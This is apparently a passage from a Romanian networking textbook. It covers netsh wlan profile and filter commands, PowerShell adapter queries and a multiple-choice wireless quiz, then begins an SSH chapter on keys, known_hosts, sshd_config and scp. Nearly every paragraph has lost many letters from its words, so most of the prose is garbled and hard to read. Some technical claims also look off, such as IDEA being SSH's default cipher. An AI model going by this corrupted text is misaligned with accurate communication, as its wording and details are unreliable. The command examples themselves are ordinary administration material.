Opţio al, ai pot fi folosiţi doi pa a et i supli e ta i: pa a et ul user, a e da ă

ă â e espe ifi at, i po tă setă ile auto at pe t u utilizato ul u e t sau poate p i i u a
dintre valorile all sau current, iar parametrul interface pe t u a spe fi a o a u ită
i t efaţă wireless pe t u a e p ofilul să fie apli at.
La spe ifi a ea i tefeţei, se pot folosi si olu ile ? şi * (wildcard) pentru aproximarea
denumirilor.
E po ta ea odifi ă ilo efe tuate se poate ealiza şi p i pa a et ul dump, care va
exporta un script ce poate fi e e utat pe t u a efa e o o figu aţie i te edia ă, sp e
exemplu:
netsh wlan dump > c:\wlandump.txt
5.5.1.3 Co e tarea şi de o e tarea

O alte ati ă la i te faţa Connect to a network o ep ezi tă o e zile de o e ta e şi
de o e ta e de la eţele wireless utilizabile prin intermediul lui netsh wlan. Atât conectarea
ât şi de o e ta ea se ealizează p i i te ediul u elui p ofilului o figu at pe t u a ea
eţea.
Co e zile se foloses î odul u ăto :
connect ssid=linksys name=linksys_profile interface=”Wireless Network Adapter”
Co a da a te ioa ă ealizează o e ta ea la o eţea ia u ătoa ea, de o e ta ea:

disconnect interface=”Wireless Network Adapter”
201 | W i r e l e s s
Da ă î siste este i stalată doa o si gu ă i te faţă wireless, parametrul interface

poate să lipseas ă. Î azul î a e se î ea ă o e ta ea la o eţea folosi du-se o i te faţă
a e este deja o e tată la o altă eţea, se a ealiza de o e ta ea de la eţeaua a te ioa ă şi
o e ta ea la ea dată a pa a et u. Co e ta ea la a eeaşi eţea la a e i te faţa este deja
o e tată a etu a u esaj a e a u ţă o e ta ea u su es, da sta ea o e iu ii u a fi
odifi ată î i iu fel.
5.5.1.4 Filtre şi profiluri

netsh ofe ă posi ilitatea de a apli a filt e pe aza ““ID-u ilo eţelelo wireless. Cu alte
cuvinte, a esul o e ta ea la a u ite eţele poate fi lo at sau pe is î od e pli it.
Pentru managementul filtrelor, se pot folosi parametrii add filter şi delete filter ca în
e e plele u ătoa e:
netsh wlan add filter permission=block ssid=linksys networktype=infrastructure
Co a da de ai sus ealizează adăuga ea u ui filt u a e i te zi e o e ta ea la eţele de

tip i f ast u tu ă u u ele „linksys . Pe isiu ile posi ile su t de tipul allow, block sau
denyall. De ase e ea, tipul eţelei dat p i pa a et ul networktype poate fi
infrastructure sau adhoc.
De ase e ea, se foloseşte o o a dă si ila ă pe t u şte ge ea u ui filt u:
netsh wlan delete filter permission=block ssid=linksys networktype=infrastructure
Atât î azul adăugă ii ât şi î azul şte ge ii de filtre, utilizarea parametrului ssid este
e esa ă doa pe t u alo ile de allow sau block ale parametrului permission. Da ă se
eează sau se şte ge u filt u u pe isiu ea denyall, parametrul ssid nu trebuie inclus.
Definirea profilurilor wireless este, de ase e ea, posi ilă p i i te ediul lui netsh wlan.
Pe t u a adăuga sau şte ge p ofilu i se foloses pa a et ii add profile sau delete profile,
a î e e plele u ătoa e, pe t u adăuga e, espe ti , şte ge e de p ofilu i:
netsh wlan add profile filename=”my_wlan_profile.xml” interface=”Wireless Network
Adapter” user=all
netsh wlan delete profile name=”linksys_profile interface=”Wireless Network Adapter”
user=all
Adăuga ea p ofilu ilo e esită spe ifi a ea fişie ului di a e să fie î ă ate setă ile. Din
a est fişie se î a ă şi u ele p op iu-zis al profilului, ce este folosit mai apoi pentru
o a da de şte ge e. T e uie ţi ut o t de faptul ă setă ile sto ate î fişie e de tip p ofil u
su t î ă ate de ât la o e zi de tip add profile, configu aţia u e tă fii d sto ată î
siste ul de ope a e, astfel ă odifi a ea u ui fişie p ofil fă ă î ă a ea lui nu va avea niciun
efect (cu alte cuvinte, u su t o side ate fişie e de o figu a e .
Parametrul interface este opţio al î a ele azu i şi e e folosi ea u ui u e de
i te faţă o fo odului î a e ele su t afişate p i o a da netsh wlan show
interfaces. Î o e tul folosi ii lui, adăuga ea sau şte ge ea p ofilu ilo a a ea efe t doa
pe i te faţa espe ti ă. De ase e ea, spe ifi a ea parametrului user este opţio ală şi a
efe tua odifi ă ile pe t u utilizato ul espe ti . Altfel, o e zile de ea e sau şte ge e
profiluri se vor aplica doar utilizatorului curent.
Pe t u şte ge ea p ofilu ilo , o ite ea pa a et ului interface va avea a efe t şte ge ea
p ofilului espe ti de pe toate i te feţele a ti e.
5.5.1.5 Co e zi de tip set

Comanda set autoconfig are rolul de a activa sau de a dezactiva serviciul de
auto o figu a e pe o a u ită i te faţă. Da ă se i iul de auto o figu a e este a ti , Windows
202 | ‘ e ţ e l e L o a l e
Server 2008 se a o e ta auto at la eţelele wireless p i i te faţa o espu zătoa e. I pli it,
acest serviciu este activ.
U e e plu de utilza e este u ăto ul:
netsh wlan set autoconfig enabled=yes inteface=”Wireless Network Adapter”
Parametrul enabled poate accepta valoarea yes sau no, ia e ţio a ea i te feţei este
obligatorie.
Comanda set profileorder ofe ă posi ilitatea de a at i ui p io ităţi p ofilu ilo
o figu ate pe t u a defi i o di ea î a e se p efe ă o e ta ea p i a estea.
Exemplul u ăto defi eşte p io itatea pe t u u a u it p ofil de pe o a u ită
i te faţă:
netsh wlan set profileorder name=linksys_profile interface=”Wireless Network Adapter”
priority=2
O aloa e ai i ă ep ezi tă o p io itate ai u a, ia da ă aloa ea parametrului

priority este setată pe sau , p ofilul de la at a t e e auto at pe p i a poziţie, i dife e t
da ă ai e ista u altul o figu at u a eeasi p io itate.
Comanda set tracing permite activarea sau dezactivarea modului în care serviciul
wireless ţi e e ide ţa î ju alele de siste a e e i e telo . Î od i pli it, odul tracing
este dezactivat.
Pentru activarea tracing-ului se foloseşte o a da:
netsh wlan set tracing mode=yes
Activarea sau dezactivarea modului tracing se face prin specificarea parametrului mode
î p eu ă u alo ile yes sau no. Deoarece comportamentul implicit al tracing-ului este de a se
deza ti a î o e tul esta tă ii siste ului, pe t u e ţi e ea sa a ti ă di o e tul
aute tifi ă ii utilizato ilo este e esa ă i lude ea modului persistent.
5.5.2 Managementul serviciului wireless prin PowerShell

Pe t u a ge e a o listă su fo ă de ta el a tutu o i te feţelo de eţea i lusi ele
virtuale) folosind PowerShell, se utilizeaza comanda Get-WmiObject î odul u ăto :
PS C:\Users> Get-WmiObject win32_networkadapter | Format-Table
ServiceName MACAddress AdapterType DeviceID Name
----------- ---------- ----------- -------- ----
[...]
bcm4sbxp 00:13:D4:9E:5... Ethernet 802.3 6 Broadcom 440x...
BCM43XX 00:19:7E:11:9... Ethernet 802.3 7 Dell Wireless...
[...]
BTWDNDIS 00:19:7D:E1:A... Ethernet 802.3 18 Bluetooth LAN...
[...]
5-27: I terfețele de rețea listate pri WMI
Di lista o ţi ută ai sus este i po ta t de ide tifi at u ele i te feţei wireless

î p eu ă u ide tifi ato ul său â pul DeviceID pe t u a o putea sele ta u uşu i ţă î
continuare:
PS C:\Users> Get-WmiObject win32_networkadapter | where {$_.DeviceId -eq 7}
ServiceName : BCM43XX
MACAddress : 00:19:7E:11:91:64
AdapterType : Ethernet 802.3
DeviceID : 7
Name : Dell Wireless 1390 WLAN Mini-Card #3
NetworkAddresses :
Speed : 11000000
203 | W i r e l e s s
Rezultatul lui Get-WmiObject win32_networkadapter a fost trimis prin operatorul pipe

| i st u ţiu ii where, a e sele tează doa i t ă ile e o espu d o diţiei di pa a teză
(câmpul DeviceId al o ie tului u e t t e uie să fie . Pe t u a efe tua î o ti ua e ope aţii
asup a i te feţei sele tate, a o ie t, este ai uşo să se păst eze o efe i ţă asup a o ie tului
returnat într-o a ia ilă:
$my_wireless = Get-WmiObject win32_networkadapter | where {$_.DeviceId -eq 5}
După e s-a o ţi ut efe i ţa la o ie tul eat, a estuia i se pot seta dife ite p op ietăţi sau
i se pot apela metodele. Pe t u o listă o pletă a p op ietăţilo şi etodelo dispo i ile se
poate trimite obiectul nou creat comenzii Get-Member:
PS C:\Users\Administrator> $my_wireless | Get-Member
Co a da de ai sus etu ează ap o i ati de etode şi p op ietăţi ale i te feţei de

eţea. U a di t e utiliză ile si ple ale lo ep ezi tă apela ea etodelo
$my_wireless.Enable() sau $my_wireless.Disable().
204 | ‘ e ţ e l e L o a l e
Î tre ări
1. Cel ai popula sta da d WLAN, î o e tul de faţă, este:
 802.11a
 802.11b
 802.11g
 802.11n
2. Dezavantajul undelo di a da de , GHz faţă de ele di a da de GHz este:

 pe et ează ai g eu ate ialele
 sunt foarte nocive pentru organismele vii
 costul de p odu ţie ale e hipa e telo este ai a e
 i te fe e ţele su t ai a i
3. Câte eţele . M ps pot fu ţio a, fă ă i te fe e ţe, î a eeaşi ază de

a ţiu e î a da I“M de , GHz ?
 1
 2
 3
 4
4. Î eod de fu ţio a e t e uie o figu ată pla a de eţea u ajuto ul utilita ului
iwconfig pentru a se putea realiza capturi de trafic:
 Monitor
 Managed
 Ad-hoc
 Promiscuous
5. Ca e di t e u ătoa ele etode ofe ă el ai i i el de se u itate:

 Filt a ea pe ază de MAC
 Eliminarea SSID broadcast
 Securitatea WEP
 Securitatea WPA2
6. Ca e di u ătoa ele utilita e pot fi folosite pe t u o figu a ea te po a ă a

parametrilo de i el ai u ei eţele wireless.
 Ifconfig
 iproute2
 iwconfig
 route
7. Teh i a folosită î p oto olul i eless pe t u a es la ediu este:
 CSMA/CD
 CSMA/CA
 Wireless CSMD
 CSMW
205 | W i r e l e s s
8. Ca e di u ătoa ele sta da de este u sta da d de Wi eless MAN ?

 802.11n
 802.13z
 802.3ab
 802.13e
9. Ca e di u ătoa ele dispoziti e u poate aso ia lie ţi la o eţea i f ast u tu ă?

 Access point
 Router wireless
 Bridge
 Controller wireless
10. Undele wireless sunt unde de tip:

 Microunde
 U de adio de î altă f e e ţă
 Ultraviolete
 Unde audio
206 | ‘ e ţ e l e L o a l e
6 Securitate şi monitorizare
Ce se î vaţă di acest capitol?
 Fu ţio a ea p oto olului ““H
 Co figu a ea de ază şi a a sată a p oto olului ““H
 Fu ţio a ea u ui firewall
 Co figu a ea de ază şi a a sată de filt a e de pa hete
 Configurarea Wireshark
 Configurare snort
 Configurare Windows Firewall
 Monitorizare în Windows
Cine este...
Bruce Schneier este u spe ialist î se u itate. “ h eie este auto ul Applied
C ptog aph și P a ti al C ptog aph . “ h eie a p oie tat sau o t i uit la
proiectarea mai multor algoritmi de criptare precum Blowfish, Twofish, Helix. În acest
o e t, “ h eie este C“TO la BT Cou te pa e, o pa ie pe a e a î fii ţat-o.
Daniel J. Bernstein este ate ati ia și p og a ato . A tual e te este p ofeso la
Universitatea din Illi ois. Be stei este auto ul ail, pu li file și dj d s. Be stei a
pu li at u u ă i po ta t de a ti ole î ate ati ă. Be stei este auto ul i liote ii
ate ati e dj fft folosită pe t u al ulul FFT.
Theo de Raadt este fo dato ul și o du ăto ul p oie telo Ope B“D și Ope ““H. De
Raadt a fo dat Ope B“D după e a pă ăsit p oie tul NetB“D. P oie telo Ope B“D și
de i ate su t u os ute pe t u p eo upa ea pe t u se u itate. O pe so alitate a azi ă,
Theo de Raadt a a ut o fli te u alţi e i di comunitatea open-source, dar îi sunt
e u o ute e itele î p o o a ea d i e elo f ee soft a e și a odelului des his de
dezvoltare.
6.1 Secure Shell (SSH)

SSH (Secure Shell este u p oto ol utilizat pe t u a esul la dista ţă şi pe t u e e uta ea
comenzilor pe o aşi a de la dista ţă. A fost o eput pe t u a î lo ui rlogin, rsh şi
telnet şi pe t u a asigu a o u i aţie iptată î t e două staţii e o u i ă î t -o eţea
esigu ă, aşa u este I te etul. P i a alul ofe it pot fi edi e tate şi o e iu i X şi
po tu i a it a e TCP/IP. ““H utilizează o e iu i TCP, o po e ta se e as ultâ d pe po tul
22.
Aşa u s-a e ţio at şi ai sus, ““H ofe ă o o u i aţie iptată î t e două staţii,
ipta ea ofe i d datelo o fide ţialitate şi i teg itate. ““H utilizează iptog afia u hei
pu li e pe t u aute tifi a ea staţiilo e do es să se o e teze şi să e e ute o e zi la
dista ţă, o e ta ea ealizâ du-se pe aza u ui u e de utilizato şi a u ei pa ole. “u t
supo tate u ătoa ele etode de ipta e: IDEA, DE“, DE“, A‘CFOU‘, BLOWFI“H şi T““1,
implicit folosindu-se IDEA.
1
Capitolul de “e u itate di Co pute Net o ks, ediţia a pat a, Ta e au .
207 | “ e u i t a t e ş i o ito iza e
6-1: Co e iu e ““H riptată
Î p eze t, e istă două e siu i ale a estui p oto ol. P i a e siu e, ““H- , a fost la sată
î , âştigând rapid popularitatea utilizatorilor. În 1996, apare SSH- , o es ie e i teg ală
a p i ei e siu i, i o pati ilă u p i a e siu e, adu â d î u ătăţi i su sta ţiale î
p o esul de s hi a e a heilo şi î asigu a ea i teg ităţii datelo . P i ipalele dife e ţe
di t e ele două e siu i su t listate î ta elul de ai jos:
Caracteristici SSH v1 SSH v2

O si gu ă o po e tă a e Componente separate
“t u tu ă se o upă de t a spo t, pentru transport,
aute tifi a e şi sesiu e aute tifi a e şi sesiu e
Suport pentru certificate Nu Da
Modifi a ea pe iodi ă a
Nu Da
cheilor de sesiune
Foloseşte e ifi a ea C‘C-32
Ve ifi a ea i teg ităţii Foloseşte u algo it de
a e poate fi ata ată u
mesajelor criptare/decriptare puternic
ata ul pe ază de i se ţie1
6.1.1 Protocolul SSH
6.1.1.1 Instalare
Cea ai popula ă i ple e ta e a p oto olului ““H o ep ezi tă pa hetul OpenSSH, un
proiect open source, la sat şi eat de ei de la Ope B“D. Î p eze t, ea ai ouă e siu e de
OpenSSH este . p , la sată pe septe ie .
Pachetul ssh este compus dintr-un server (sshd), un client (ssh - disponibil implicit pe
ajo itatea dist i uţiilo şi u set de utilita e, pe t u gestiu ea heilo . Î ge e al sshd este
po it de s iptu ile de i iţializa e ale siste ului şi ulează pe a e t î background.
I stala ea se e ului ““H i lude i stala ea u o odule adiţio ale u a fi:
 sshd – componenta server
 ssh-keygen – utilitar folosit pentru generarea cheilor
 ssh-keyscan – utilitar folosit pentru administrarea cheilor publice
 scp – utilitar pe t u opie ea sigu ă de fişie e
 ssh-agent – o po e ta folosită pe t u sal a ea heilo p i ate et .
root@myr:~# apt-get install ssh
openssh-server
Suggested packages:
1
https://honor.trusecure.com/pipermail/firewall-wizards/1998-June/002845.html
208 | ‘ e ţ e l e L o a l e
rssh
The following NEW packages will be installed:
openssh-server ssh
Do you want to continue [Y/n]? y
[...]
Setting up openssh-server (4.2p1-7ubuntu3) ...
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
* Restarting OpenBSD Secure Shell server... [ ok ]
Setting up ssh (4.2p1-7ubuntu3) ...
Odată i stalat, se e ul ““H este po it auto at. Pe t u po i ea sau epo i ea sa se

poate folosi scriptul /etc/init.d/ssh.
root@myr:~# /etc/init.d/ssh -h
Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart}
6.1.1.2 Fu țio area proto olului ““H
6.1.1.2.1 Criptografia cu chei publice

C iptog afia ep ezi tă p o esul de t a sfo a e a u ui te t la î t -u te t if at. Ea stă
la aza ulto se i ii şi e a is e de se u itate folosite î I te et, folosi d etode
mate ati e pe t u t a sfo a ea datelo , u i te ţia de a as u de o ţi utul lo sau de a le
p oteja î pot i a odifi ă ii. “e u iza ea o u i aţiilo î I te et poate fi o pa ată u
se a ea u ei s iso i şi t i ite ea a esteia î t -u pli sigilat. “e ătu a dă aute ti itatea
s iso ii, ia pli ul sigilat îi o fe ă a esteia o fide ţialitatea e esa ă.
Ele t o i , o fide ţialitatea este asigu ată p i ipta ea esajului u o heie se etă
folosi d u algo it aso iat. Ve siu ea iptată a esajului poate fi itită de desti ata u ai
da ă a esta posedă heia se etă şi algo it ul de de ipta e.
E istă două tipu i de siste e iptog afi e:
 si et i e u hei se ete , a e foloses a eeaşi heie atât la ipta ea ât şi la de ipta ea
mesajelor.
 asimetrice u hei pu li e , a e foloses hei disti te de ipta e şi de ipta e. U a di hei
este ţi ută se etă şi este u os ută doa de p op ieta ul ei. A doua heie pe e hea ei este
fă ută pu li ă, deoa e e este i posi ilă dedu e ea u ei hei di ealaltă.
U a di t e etodele de aute tifi a e folosită de p oto olul ““H este azată pe algo it ul
RSA (Rivert-Shamir-Adleman . Pu li at î ă di , ‘“A este u algo it folosit pe t u
criptografia cu chei publice.
C iptog afia u hei pu li e fu ţio ează î odul u ăto : o pe soa ă a e do eşte să
p i eas ă esaje se ete deţi e două hei, u a pu li ă şi u a p i ată. Cheia pu li ă poate fi
afişată pe pagi a We pe so ală sau fă ută pu li ă p i t -un alt mijloc, aceasta putând fi
ăzută de ăt e o i i e. Cheia p i ată, î s hi , a fi ţi ută se etă pe staţia lo ală. Da ă î
a este o diţii i e a a do i sa t i ită esaje se ete a estei pe soa e, a lua heia pu li ă
afişată pe pagi a We pe so ală şi a ipta esajul. Câ d esajul a aju ge la desti aţie,
pe soa a e deţi e heia p i ată pe e hea heii pu li e a e a fost utilizată î ipta ea
esajului t i is a de ipta esajul u ajuto ul a esteia. Î a se ţa heii p i ate esajul u
va putea fi decriptat, astfel încât numai destinatarul lui de drept îl va putea citi.
În procesul de instalare a se e ului, a fi eată i pli it o pe e he de hei pu li ă şi
p i ată , fie a e heie fii d sto ată î t -unul dintre fişie ele: /etc/ssh/ssh_host_rsa_key şi
/etc/ssh/ssh_host_rsa_key.pub. Î fişie ul ssh_host_rsa_key.pub este sal ată heia
pu li ă, ia î fişie ul ssh_host_rsa_key heia p i ată.
6.1.1.2.2 Stabilirea conexiunii

Fie a e staţie lie t a e o heie p i ată ‘“A, host key î od o al pe de iţi . Î
plus, atunci când este pornit, daemon-ul ssh (sshd ge e ează auto at o a doua heie, server
key pe de iţi . A easta este ege e ată di o ă î o ă da ă a fost folosită şi u este
păst ată i iodată pe dis . De fie a e dată â d u lie t i iţiază o o e iu e, daemon-ul îi
trimite host key şi server key a e este pu li ă . Clie tul o pa ă host key primit cu cea din
aza lui de date, pe t u a e ifi a da ă u s-a s hi at, apoi ge e ează u u ă aleato pe
de iţi. Clie tul iptează a est u ă folosi d î tâi host key şi apoi server key şi trimite
u ă ul iptat la se e . Î o ti ua e a ele pă ţi o folosi a est u ă aleato a o heie
de criptare.
6.1.2 Configuraţii de bază SS(
6.1.2.1 Utilizarea serviciului ssh

Co a da de o e ta e la u se e ““H a e doi pa a et ii i po ta ţi: u ele
utilizatorului şi ad esa u ele se e ului desti aţie. “e e ul de ““H la a e se a fa e
conectarea: securessh.pub.ro (în exemplul de mai jos), acest nume este un nume public, pe
care serviciul de DNS îl va traduce într-o ad esă IP. Da ă se do eşte o e ta ea la un server dar
u se u oaşte u ele său DN“, se poate i t odu e di e t IP-ul serverului. Când un client
i iţiază o o e iu e ssh pe u se e , t e uie să se o e teze pe u utilizato e iste t pe a el
server pentru a putea avea acces la interpretorul de comenzi. Parametrul bogdand spe ifi ă
utilizato ul î o tul ă uia se a i t a la sta ili ea o e iu ii.
waters@myr:/$ ssh bogdand@securessh.pub.ro
Password:
Last login: Wed Sep 19 14:37:29 2007 from 86.121.138.243
Welcome to the dark side.. we've got cookies!
securessh:/$
În rezultatul comenzii de mai sus se poate observa faptul ca s-au ai fă ut o e iu i

a te ioa e pe a el se e de ““H, fii d ofe ită atât o a şi data ulti ei o e iu i, ât şi ad esa IP
de la care s-a realizat conexiunea.
Când un client de SSH i iţiază pe t u p i a dată o o e iu e ăt e u se e ou, a esta
di u ă a t e ui sa se aute tifi e ăt e lie t. Fie a e se e de ““H a e u ide tifi ato u i
(host key u a e se aute tifi ă lie ţilo . A est ID este i ple e tat p i hei pu li e şi hei
p i ate. La p i i ea u ei o e iu i de la u lie t, se e ul ofe ă heia sa pu li ă, fă â d astfel
posi ilă aute tifi a ea. La a epta ea heii pu li e de la se e , lie tul adaugă a eastă heie
î fişie ul known_hosts. Astfel, u ătoa ea conexiune pe care acest client o va face la server
u a ai e esita t a sfe ul heii pu li e, a easta e istâ d deja sto ată pe lie t.
Pe t u a ealiza a est lu u, lie tul ““H a sal a heia se e ului î fişie ul lo al
$HOME/.ssh/known_hosts. La u ătoa ea o e ta e pe a elaşi se e , lie tul ““H a e ifi a
a est fişie şi, da ă a găsi heia pu li ă ofe ită de a esta se a afişa pe t u aute tifi a e doa
parola.
U e e plu de fişie known_hosts este u ăto ul:
waters@myr:/$ ls ~/.ssh/known-hosts
acmserver,141.85.37.165 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA7ijnAivb7dfGLkfYJlSk0wDWd2MkeP9YQctVfyb/8OfgVTLlp3eMimItJKv7rL5Angb
+A8bxdBy+tn7n0iDyoMNIAQP+rVBG2tDw1wTdl0mAhes90rOy4xOtVBOaF40dg7iy3/9zgp8HlVdiVjibuXeaIKAzew/k/I
XSB8YRd18=
atlantis.cs.pub.ro,141.85.37.4 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAqJT/wsciLHg9g1CHrFkvx9KaSl4Z7uQROWSEJd6zFWey4aMmcW//A6rrNK7DK6luv+A
eJLMHA8+1IcnzDSV+pFUH/7IeR1ryrkyGmQRjnp5crrVDPY+ixOrR3Drpn6tpEb8woW12Ti0QXGNywc3g7w7VbSTP7AZGwN
lMBes26PM=
210 | ‘ e ţ e l e L o a l e
Pe prima linie sunt trecute numele serverului de la dista ţă şi ad esa IP a a estuia, apoi
u â d heia pu li ă. Î e e plul de ai sus e istă două se e e la a e utilizato ul s-a
o e tat î p eala il şi a ă o heie pu li ă a fost sal ată.
A este hei se pot afla î două lo u i di siste ul de fişie e:
 /etc/ssh/ssh_known_hosts, fişie a ă ui lo aţie poate fi s hi ată alte a ea di e ti ei
GlobalKnownHostsFile di fişie ul de o figu a e /etc/ssh/ssh_config.
 $HOME/.ssh/known_hosts, fişie a ă ui lo aţie poate fi s hi ată p i alte a ea di e tivei
UserKnownHostsFile di a elaşi fişie de o figu a e.
Î aptu a de ai jos se poate o se a u la p i a o e iu e ealizată la u se e ,
lie tul eţi e a p e ta a estuia î fişie ul known_hosts:
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
student@localhost's password:
Linux ubuntu 2.6.15-26-386 # 1 PREEMPT Thu Aug 3 02:52:00 UTC 2006 i686 GNU/Linux
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
6.1.2.2 Utilizarea ““H pe tru rularea de o e zi la dista ță

“i ta a o pletă a utilita ul ssh permite precizarea unei liste de parametri a utilizatorului
şi a ad esei desti aţie, p e u şi a u ei o e zi e a fi ulată după sta ili ea sesiu ii ““H.
Da ă u este p e izată o o a dă se a ula u i te p eto de o e zi el ai adesea
/bin/bash).
În exemplul de mai jos, sunt ulate lo al două o e zi sepa ate p i „;”. Apoi se ulează
a eleaşi o e zi de data a easta p otejate î t e ghili ele , ezultatul afişat este el al
e e ută ii lo pe staţia desti aţie, după aute tifi a ea u utilizato ul bogdand. “e o se ă di
exemplu ă aute tifi a ea se ealizează fă ă a i te oga utilizato ul, a easta fii d ezultatul u ei
aute tifi ă i pe ază de hei.
waters@myr:~$ hostname; pwd
apple
/home/rrazvan
rrazvan@apple:~$ ssh bogdand@141.85.99.5 "hostname; pwd"
kiwi
/home/users/bogdand
Î t e a ea e se idi ă î o ti ua e este u se poate e ifi a a p e ta ‘“A. Da ă s-a

realizat o conexiune la un server SSH, dar un atacator a interceptat conexiunea, este posibil ca
î u a u ei eate ţii, p i si pla a epta e a espe ti ei hei, să se accepte de fapt cheia
falsă şi u pe ea eală. O etodă a putea fi pu li a ea a p e tei ‘“A heia pu li ă pe site-
ul ofi ial al elui e ofe ă u astfel de se i iu. Da ă u e istă a eastă posi ilitate, heia
t e uie e ifi ată i ediat după e -aţi aute tifi at. A est lu u se ealizează folosi d utilita ul
ssh-keygen şi o pa â d ezultatele o ţi ute u ele ofe ite de se e . Da ă ezultatele su t
identice, atunci autentificarea s-a ealizat u su es pe staţia do ită.
ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
E istă două odalităţi de e e uţie a o e zilo p i SSH. Prima presupune executarea

comenzilor dorite după ealiza ea o e iu ii. Prin cea de-a doua etodă o e zile do ite
su t date a a gu e te lie tului ““H. Pe t u a easta di u ă, de fie a e dată â d se a
e e uta o a u ită o a dă, a t e ui i t odusă pa ola utilizato ului e des hide sesiu ea.
root@myr:~# ssh student@localhost ls
Examples
root@myr:~# ssh student@localhost pwd
/home/student
root@myr:~# ssh student@localhost uname -a
6.1.2.3 Fişierul de o figurare pe tru ser er

Fişie ul p i ipal pe t u o figu a ea serverului SSH este /etc/ssh/sshd_config. Câteva
directive importante pentru configurarea serviciului sunt:
 [Port 22] – spe ifi ă po tul pe a e as ultă se e ul; po tul i pli it este .
 [ListenAddress 192.168.1.2] – spe ifi ă i te faţa pe a e as ultă daemon-ul sshd.
Ad esa i pli ită este . . . , ep eze tâ d faptul ă se as ultă pe toate i te feţele.
 [HostKey /etc/ssh/ssh_host_key] – specifică fişierul în care este
ţinută cheia privată a utilizatorului.
 [ServerKeyBits 1024] – defi eşte u ă ul de iţi din server key (implicit 768).
 [KeyRegenerationInterval 3600] – spe ifi ă după ât ti p a fi ege e ată heia
se e ului. A easta poate fi o etodă de a p e e i de ipta ea î azul i te eptă ii u ei
sesiuni în urma unui atac man-in-the-middle.
 [PermitRootLogin] – poate fi „ es , „ op d sau „ o şi se efe ă la posi ilitatea
aute tifi ă ii p i SSH folosind contul de root; „ op d se ifi ă faptul ă u este pe isă
aute tifi a ea u pa olă. A eastă opţiu e t e uie î totdeau a setată pe „ o di oti e de
securitate.
 [X11Forwarding yes] – spe ifi ă da ă este pe isă edi e ta ea o e iu ilo X peste o
conexiune de SSH.
 [RSAAuthentication yes] – spe ifi ă folosi ea aute tifi ă ii folosi d p oto olul ‘“A.
 [AllowUsers admin] – spe ifi ă utilizato ii a e se pot conecta prin acest serviciu.
 [PrintMotd] – spe ifi ă da ă sshd-ul a afişa o ţi utul fişie ului /etc/motd după
autentificarea unui utilizator. MOTD (Message of the Day ep ezi tă u te t afişat
utilizato ului după aute tifi a e, da î ai te de apa iţia p o ptului, a e o ţi e esaje de la
administrator.
6.1.2.4 Copierea fişierelor la dista ță

U ul di t e utilita ele i po ta te e apa ţi pa hetului Ope ““H este scp (Secure Copy).
“CP este u p oto ol folosit î t a sfe ul sigu de fişie e î t e două staţii, pe durata
t a sfe ului datele fii d iptate de o sesiu e ““H. P oto olul î si e u asigu ă aute tifi a ea
şi se u itatea o u i aţiei, a estea fii d asigu ate de ăt e p oto olul ““H.
Astfel, da ă se do eşte opie ea unui fişie de pe staţia lo ală pe o staţie la dista ţă se
poate folosi u ătoa ea si ta ă:
scp cale_fişier_local utilizator@staţie_distanţă:/cale_fişier
Î s hi , da ă se do eşte opie ea u ui fişie de pe o staţie la dista ţă pe staţia lo ală se

poate folosi u ătoa ea si ta ă:
scp utilizator@staţie_distanţă:/cale_fişier_remote /cale_fişier
Notă: da a se foloseşte o ad esa e elati ă, u se ai foloseşte „/ la î eputul ăii

fişie ului
6.1.2.4.1 Copierea u ui si gur fişier pe o staţie la dista ţă

Î e e plul de ai jos, se a opia fişie ul test.txt de pe staţia lo ală di e to ul lo al
pe staţia anaconda.cs.pub.ro. Fişie ul a fi opiat î di e to ul home al utilizatorului user, cu
numele NewTest.txt.
root@myr:~# scp test.txt user@anaconda.cs.pub.ro:NewTest.txt
212 | ‘ e ţ e l e L o a l e
Pe t u a păst a u ele o igi al al fişie ului e t e uie opiat se o ite spe ifi a ea oului
nume.
root@myr:~# scp test.txt user@anaconda.cs.pub.ro:
Într-u od ase ă ăto se poate ealiza opie ea u ui di e to şi a o ţi utului a estuia:

root@myr:~# scp –r test user@anaconda.cs.pub.ro:Data/NewTest/
Folosi d opţiu ea –r, directorul local test va fi copiat recursiv în directorul

Data/NewTest, aflat în directorul home al utilizatorului user de pe staţia
anaconda.cs.pub.ro.
6.1.2.4.2 Copierea u ui si gur fişier de pe o staţie la dista ţă

Pentru copie ea fişie ului data.txt de pe staţia anaconda.cs.pub.ro, din directorul
home al utilizatorului user, î di e to ul u e t pute folosi u ătoa ea si ta ă:
root@myr:~# scp user@anaconda.cs.pub.ro:data.txt NewData.txt
Î o a da de ai sus, fişie ul se sal ează î di e to ul u e t su u ele de

NewData.txt.
Cum s-a e ţio at şi ai sus, se poate spe ifi a şi alea pe t u fişie ul e se do eşte a fi
opiat. Î e e plul de ai jos, fişie ul data.txt, aflat în subdirectorul scoala/teste (relativ
la directorul home al utilizatorului user , a fi opiat î di e to ul u e t, fişie ul păst â d
a elaşi u e.
root@myr:~# scp user@anaconda.cs.pub.ro:scoala/teste/data.txt .
6.1.3 Configuraţii avansate SS(
6.1.3.1 Redire tarea X şi TCP/IP peste ““H

Da ă utilizato ul foloseşte X11 (variabila de mediu DISPLAY fii d setată , o e iu ea u
display-ul X11 este t a sfe ată auto at la dista ţă î aşa fel î ât o i e p og a X11 pornit
din shell (sau printr-o o a dă este t e ut p i a alul iptat şi o e iu ea u ade ă atul
server X va fi fă ută de pe aşi a lo ală. Utilizato ul u t e uie să seteze a ual a ia ila
DISPLAY. Transferarea conexiunilor X11 poate fi o figu ată di li ia de o a dă sau di
fişie ele de o figu a e.
‘edi e ta ea p oto olului X t e uie a ti ată atât î fişe ul sshd_config (prin variabila
X11Forwarding) ât şi î fişie ul ssh_config (prin variabila ForwardX11). Ambele variabile
t e uies setate la aloa ea „yes .
Î li ia de o a dă pute folosi opţiu ea –X pentru stabilirea conexiunii.
root@myr:~# ssh -X student@anaconda.cs.pub.ro
T a sfe a ea u ei o e iu i TCP/IP p i a alul sigu ofe it de ““H poate fi spe ifi ată fie
di li ia de o a dă, fie di fişie ele de o figu a e. O apli aţie posi ilă a edi e tă ii TCP/IP
este trecerea de un firewall în vederea citi ii poştei ele t o i e.
